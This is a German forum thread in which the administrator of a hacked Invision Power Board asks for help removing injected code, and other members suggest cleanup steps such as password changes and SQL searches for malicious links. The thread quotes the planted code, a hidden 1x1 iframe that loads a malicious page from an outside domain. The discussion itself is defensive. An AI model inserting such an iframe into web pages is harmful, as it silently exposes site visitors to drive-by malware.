Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support
Sign in to follow this  
Dan5

Board gehackt!

Recommended Posts

Hallo

Unser Board wurde gehackt. Beim Besuch der Seite wird eine Datei zum Download aufgerufen, welche den Trojaner "Exploit-WMF" (Link: Torjaner Info) beinhaltet.

Nun bin ich gerade dabei Peters "Security Fixes, Updates And Enhancements For IPB 1.3.1" zu installieren. Dabei bin ich auf eine Unregelmässigkeit gestossen:

Unter "Step 15" wird man aufgefordert, in der Datei sources/lib/post_parser.php Code zu ergänzen. Dies soll in den Funktionen regex_check_iframe(..) und regex_check_image(..) geschehen. Problem, die Funktion regex_check_iframe(..) ist bei mir überhaupt nicht vorhanden! Auch in der eben zum Vergleich runtergeladenen 1.3.1 Version, findet sich in der Datei post_parser.php keine Funktion regex_check_iframe!?

Fehler?

Mich würde zudem interessieren, wie ich diesen autom. Download wieder aus dem Board kriege. Reichen die Anpassungen im genannten Mod oder muss ich den irgendwie manuell entfernen? Ich verstehe aussderm nicht, wo dieser Aufruf geschieht? Aus der Datenbank?

Ich verfüge noch über eine 2.x Version, welche ich gekauft habe und auf diese ich demnächst updaten wollte. Sollte ich vielleicht gleich ein Update auf diese Version Vornehmen? Kann ich damit die Probleme beheben?

Über rasche Hilfe würde ich mich freuen!

Grüsse.

Share this post


Link to post

Prüf mal bitte, ob in deinem Board Wrapper etwas eingefügt wurde. Des Weiteren kann es es sein, das diverse Links in Beiträgen geändert wurden.

Bevor du das Update machst, solltest du sicher sein, das an deinen Daten innerhalb der Datenbank keine Änderungen durch den "Hacker" gemacht wurden. Zusätzlich solltest du prüfen, welche Accounts Zugriff auf das ACP haben und bei denen das Passwort ändern. Verdächtige Accounts mit ACP Zugriff sofort löschen.

Share this post


Link to post

Hallo Stefan

Danke für die schnelle Antwort!

Unbekannte Mitglieder in den Admin bzw. Moderatoren Gruppen sind nicht vorhanden. Allerdings wurde im Wrapper folgender Code eingefügt:

<iframe src='http://traffall.biz/adv/195/new.php' width=1 height=1></iframe>

Das dürfte auch der Übeltäter sein.

Wie soll ich weitermachen?

Grüsse.

Edited by Dan5

Share this post


Link to post

Du kannst per SQL Statement prüfen, ob Links geändert wurden.

SELECT * FROM ibf_posts WHERE post LIKE "%traffall.biz%";

SELECT * FROM ibf_posts WHERE post LIKE "%traffdollars.biz%";

SELECT * FROM ibf_posts WHERE post LIKE "%.biz%";

Share this post


Link to post

Hallo Stefan

Ich habe diese Befehle in der "mySQL Toolbox" unter "Run a Query" ausgeführt, ist das korrekt? Ich erhalten jeweils folgender Fehler:

Unknown column 'posts' in 'where clause'

Grüsse.

Share this post


Link to post

Sicherheitshalber würde ich das Passwort für die MySQL Datenbank ändern. Ebenfalls sollten alle Administratoren und Moderatoren ihre Passwörter ändern.

Schau mal in dem upload Order, sowie archiv_in und archiv_out Ordner, ob dort noch irgendwelche Daten liegen, die da nicht hingehören.

Share this post


Link to post

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this  

×